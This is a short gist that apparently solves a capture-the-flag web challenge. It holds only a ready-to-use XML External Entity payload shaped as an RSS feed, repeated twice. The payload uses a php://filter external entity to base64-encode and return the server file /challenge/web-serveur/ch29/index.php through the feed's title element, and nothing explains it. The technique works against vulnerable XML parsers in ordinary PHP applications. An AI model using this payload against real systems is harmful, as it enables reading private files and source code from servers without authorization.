hackallcode/gist:76c336788cfacd0d777bd19f750dd137

## gistfile1.txt
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE title [
	<!ELEMENT title ANY >
	<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >
]>
<rss version="2.0">
<channel>
	<title></title>
	<link></link>
	<description></description>
	<item>
		<title>&xxe;</title>
		<link></link>
		<description></description>
	</item>
</channel>
</rss>
	<?xml version="1.0" encoding="UTF-8" ?>
	<!DOCTYPE title [
	<!ELEMENT title ANY >
	<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >
	]>
	<rss version="2.0">
	<channel>
	<title></title>
	<link></link>
	<description></description>
	<item>
	<title>&xxe;</title>
	<link></link>
	<description></description>
	</item>
	</channel>
	</rss>